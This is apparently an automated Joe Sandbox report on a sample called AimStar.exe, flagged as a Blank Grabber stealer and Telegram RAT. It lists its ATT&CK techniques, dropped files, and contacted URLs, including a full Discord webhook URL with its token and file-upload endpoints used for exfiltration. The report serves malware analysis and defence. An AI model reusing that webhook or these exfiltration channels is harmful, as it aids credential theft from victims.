Source: Yara match	File source: 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AimStar.exe PID: 7332, type: MEMORYSTR

Remote Access Functionality

Yara detected Blank Grabber

Source: Yara match	File source: 00000000.00000003.2021999995.00000192BB8F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2021999995.00000192BB8F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AimStar.exe PID: 7284, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AimStar.exe PID: 7332, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI72842\rarreg.key, type: DROPPED

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: AimStar.exe PID: 7332, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	241 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	4 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	3 Native API	2 Registry Run Keys / Startup Folder	1 Access Token Manipulation	11 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	3 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	1 System Shutdown/Reboot
Email Addresses	DNS Server	Domain Accounts	122 Command and Scripting Interpreter	Logon Script (Windows)	11 Process Injection	21 Obfuscated Files or Information	Security Account Manager	48 System Information Discovery	SMB/Windows Admin Shares	1 Clipboard Data	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	2 Registry Run Keys / Startup Folder	11 Software Packing	NTDS	251 Security Software Discovery	Distributed Component Object Model	Input Capture	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	151 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	151 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	11 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
AimStar.exe	36%	Virustotal		Browse
AimStar.exe	34%	ReversingLabs	Win64.Trojan.Generic

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\_MEI72842\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72842\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72842\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72842\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72842\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72842\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72842\_queue.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72842\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72842\_sqlite3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72842\_ssl.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72842\libcrypto-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72842\libffi-8.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72842\libssl-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72842\python313.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72842\select.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72842\sqlite3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72842\unicodedata.pyd	0%	ReversingLabs

Source	Detection	Scanner	Label
https://api.anonfiles.com/upload	0%	Avira URL Cloud	safe
http://ocsp.sectigo.com0$	0%	Avira URL Cloud	safe
http://www.heaventools.com	0%	Avira URL Cloud	safe
http://www.heaventools.comDVarFileInfo$	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
discord.com	162.159.128.233	true	false	high
ip-api.com	208.95.112.1	true	false	high
skoch-6bauu.in	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://discord.com/api/webhooks/1323748851462705204/cFp6eq42ADGLAf_FT0MA15Miw7tWNx5rwD4SKkxk-ZhCNApYaj_fZlIRRuECNHrQlsm0	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	AimStar.exe, 00000002.00000003.2403445118.000002020DA06000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.avito.ru/	AimStar.exe, 00000002.00000002.2415391587.000002020DAB8000.00000004.00001000.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	AimStar.exe, 00000002.00000003.2403445118.000002020DA06000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	AimStar.exe	false		high
https://api.telegram.org/bot	AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ctrip.com/	AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	AimStar.exe	false		high
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	AimStar.exe, 00000002.00000002.2408279953.000002020C430000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.leboncoin.fr/	AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file	AimStar.exe, 00000002.00000002.2408279953.000002020C488000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tools.ietf.org/html/rfc2388#section-4.4	AimStar.exe, 00000002.00000002.2408722689.000002020C530000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64	AimStar.exe, 00000002.00000002.2408722689.000002020C530000.00000004.00000020.00020000.00000000.sdmp	false		high
https://weibo.com/	AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.anonfiles.com/upload	AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://packaging.python.org/en/latest/specifications/entry-points/#file-format	AimStar.exe, 00000002.00000002.2408279953.000002020C488000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.msn.com	AimStar.exe, 00000002.00000002.2415755951.000002020E0A4000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2216216669.000002020D354000.00000004.00000020.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 0000000C.00000002.2164613926.000002169FD97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2287372527.000002A6C80AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2287372527.000002A6C81EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2230160700.000002A6B999E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://discord.com/api/v9/users/	AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963	AimStar.exe, 00000002.00000002.2411216305.000002020CFB0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://cacerts.digi	AimStar.exe, 00000000.00000003.2020414423.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://peps.python.org/pep-0205/	AimStar.exe, 00000002.00000003.2049843028.000002020C602000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2029404019.000002020C602000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2048372597.000002020C5FC000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2048974996.000002020C602000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2030161372.000002020C602000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2048580091.000002020C5FD000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2047069115.000002020C5FD000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2029008923.000002020C5E4000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2028931603.000002020C5F6000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2025783196.000002020A76B000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2051383625.000002020C601000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2046920935.000002020C5FC000.00000004.00000020.00020000.00000000.sdmp, base_library.zip.0.dr	false		high
https://www.reddit.com/	AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000C.00000002.2115599827.000002168FD21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2230160700.000002A6B8031000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.ca/	AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://discord.com/api/webhooks/1323748851462705204/cFp6eq42ADGLAf_FT0MA15Miw7tWNx5rwD4SKkxk-ZhCNAp	AimStar.exe, 00000002.00000002.2411399871.000002020D0B0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://dsc.gg/skochworld	AimStar.exe, 00000002.00000002.2410298641.000002020CC97000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename	AimStar.exe, 00000002.00000002.2407233564.000002020C0F0000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2408279953.000002020C430000.00000004.00000020.00020000.00000000.sdmp	false		high
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	AimStar.exe, 00000002.00000002.2411399871.000002020D0B0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	AimStar.exe, 00000002.00000002.2407233564.000002020C174000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.ebay.co.uk/	AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000039.00000002.2230160700.000002A6B9918000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000C.00000002.2115599827.000002168FF48000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ebay.de/	AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000039.00000002.2230160700.000002A6B9918000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code	AimStar.exe, 00000002.00000002.2407233564.000002020C0F0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000039.00000002.2230160700.000002A6B8E50000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	AimStar.exe, 00000002.00000002.2408279953.000002020C430000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.amazon.com/	AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/python/cpython/issues/86361.	AimStar.exe, 00000002.00000002.2410298641.000002020CB38000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000039.00000002.2230160700.000002A6B999E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	AimStar.exe, 00000002.00000003.2403445118.000002020DA06000.00000004.00000020.00020000.00000000.sdmp	false		high
https://httpbin.org/	AimStar.exe, 00000002.00000002.2409740452.000002020CAF6000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	AimStar.exe, 00000000.00000003.2021718981.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module	AimStar.exe, 00000002.00000002.2407233564.000002020C0F0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches	AimStar.exe, 00000002.00000002.2407233564.000002020C0F0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	AimStar.exe, 00000002.00000003.2403445118.000002020DA06000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	AimStar.exe, 00000002.00000003.2133349220.000002020D2F1000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2137253996.000002020D372000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com/	AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://allegro.pl/	AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000039.00000002.2230160700.000002A6B9918000.00000004.00000800.00020000.00000000.sdmp	false		high
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	AimStar.exe, 00000002.00000002.2408279953.000002020C488000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2409740452.000002020C958000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	AimStar.exe, 00000002.00000002.2408279953.000002020C430000.00000004.00000020.00020000.00000000.sdmp	false		high
https://MD8.mozilla.org/1/m	AimStar.exe, 00000002.00000003.2403909784.000002020D300000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2415755951.000002020E070000.00000004.00001000.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0$	AimStar.exe	false	Avira URL Cloud: safe	unknown
https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadata	AimStar.exe, 00000002.00000002.2411399871.000002020D0B0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.bbc.co.uk/	AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://bugzilla.mo	AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/python/importlib_metadata/wiki/Development-Methodology	AimStar.exe, 00000002.00000002.2411768598.000002020D1B0000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2410298641.000002020CCC7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://tools.ietf.org/html/rfc6125#section-6.4.3	AimStar.exe, 00000002.00000002.2411768598.000002020D1B0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000C.00000002.2115599827.000002168FF48000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google.com/mail	AimStar.exe, 00000002.00000002.2410298641.000002020CCD7000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2408722689.000002020C530000.00000004.00000020.00020000.00000000.sdmp	false		high
https://packaging.python.org/specifications/entry-points/	AimStar.exe, 00000002.00000002.2411399871.000002020D0B0000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2411216305.000002020CFB0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.heaventools.com	AimStar.exe	false	Avira URL Cloud: safe	unknown
https://www.python.org/psf/license/)	AimStar.exe, 00000002.00000002.2419478466.00007FF8A8CD9000.00000040.00000001.01000000.00000004.sdmp	false		high
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py	AimStar.exe, 00000002.00000002.2408279953.000002020C430000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/	AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.iqiyi.com/	AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://i.pinimg.com/736x/ec/43/75/ec4375c15336ba1e72b0062c515a1d92.jpg	AimStar.exe, 00000002.00000002.2409740452.000002020CAF6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://foss.heptapod.net/pypy/pypy/-/issues/3539	AimStar.exe, 00000002.00000002.2411216305.000002020CFB0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	AimStar.exe, 00000002.00000002.2408722689.000002020C530000.00000004.00000020.00020000.00000000.sdmp	false		high
http://google.com/	AimStar.exe, 00000002.00000002.2408722689.000002020C636000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	AimStar.exe	false		high
https://tools.ietf.org/html/rfc7231#section-4.3.6)	AimStar.exe, 00000002.00000002.2408722689.000002020C636000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2054517827.000002020C643000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.gofile.io/getServerr~	AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000039.00000002.2230160700.000002A6B999E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://discordapp.com/api/v9/users/	AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source	AimStar.exe, 00000002.00000002.2407233564.000002020C174000.00000004.00001000.00020000.00000000.sdmp	false		high
http://ip-api.com/json/?fields=225545r	AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	AimStar.exe, 00000002.00000003.2403445118.000002020DA06000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec	AimStar.exe, 00000002.00000002.2407233564.000002020C0F0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	AimStar.exe	false		high
https://github.com/urllib3/urllib3/issues/2920	AimStar.exe, 00000002.00000002.2411768598.000002020D1B0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	AimStar.exe, 00000000.00000003.2021718981.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.gofile.io/getServerr~r	AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data	AimStar.exe, 00000002.00000002.2408279953.000002020C430000.00000004.00000020.00020000.00000000.sdmp	false		high
https://yahoo.com/	AimStar.exe, 00000002.00000002.2410298641.000002020CCD7000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2408722689.000002020C530000.00000004.00000020.00020000.00000000.sdmp	false		high
https://account.bellmedia.c	AimStar.exe, 00000002.00000002.2415755951.000002020E0B0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6	AimStar.exe, 00000002.00000002.2408279953.000002020C488000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.microsoftonline.com	AimStar.exe, 00000002.00000002.2415755951.000002020E07C000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2412961624.000002020D354000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2216216669.000002020D354000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2404357827.000002020D354000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	AimStar.exe, 00000000.00000003.2021718981.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://html.spec.whatwg.org/multipage/	AimStar.exe, 00000002.00000002.2408722689.000002020C636000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ifeng.com/	AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://i.pinimg.com/736x/ec/43/75/ec4375c15336ba1e72b0062c515a1d92.jpgz	AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings	AimStar.exe, 00000002.00000002.2411399871.000002020D0B0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.zhihu.com/	AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	AimStar.exe, 00000002.00000003.2403445118.000002020DA06000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.rfc-editor.org/rfc/rfc8259#section-8.1	AimStar.exe, 00000002.00000003.2056832978.000002020CA80000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2409740452.000002020CA73000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2056720050.000002020CD09000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000039.00000002.2230160700.000002A6B999E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.heaventools.comDVarFileInfo$	AimStar.exe	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States		53334	TUT-ASUS	false
162.159.128.233	discord.com	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583098
Start date and time:	2025-01-01 22:11:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	108
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	AimStar.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.expl.evad.winEXE@172/63@4/2
EGA Information:	Successful, ratio: 60%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 172.217.16.195, 172.202.163.200, 2.22.50.131, 2.22.50.144, 52.165.164.15, 20.242.39.171, 13.107.246.45
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, gstatic.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Execution Graph export aborted for target powershell.exe, PID 7444 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7552 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
16:12:01	API Interceptor	8x Sleep call for process: WMIC.exe modified
16:12:03	API Interceptor	134x Sleep call for process: powershell.exe modified
16:12:16	API Interceptor	3x Sleep call for process: SIHClient.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	L988Ph5sKX.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	kj93GnZHBS.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	ip-api.com/line/?fields=hosting
	ANuh30XoVu.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	rivalsanticheat.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	rename_me_before.exe	Get hash	malicious	Python Stealer, Exela Stealer	Browse	ip-api.com/json
	vEtDFkAZjO.exe	Get hash	malicious	RL STEALER, StormKitty	Browse	ip-api.com/xml
	Fizzy Loader.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	ip-api.com/json/?fields=225545
	Extreme Injector v3.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	VegaStealer_v2.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer	Browse	ip-api.com/json/?fields=61439
	SharcHack.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer, Xmrig	Browse	ip-api.com/json/
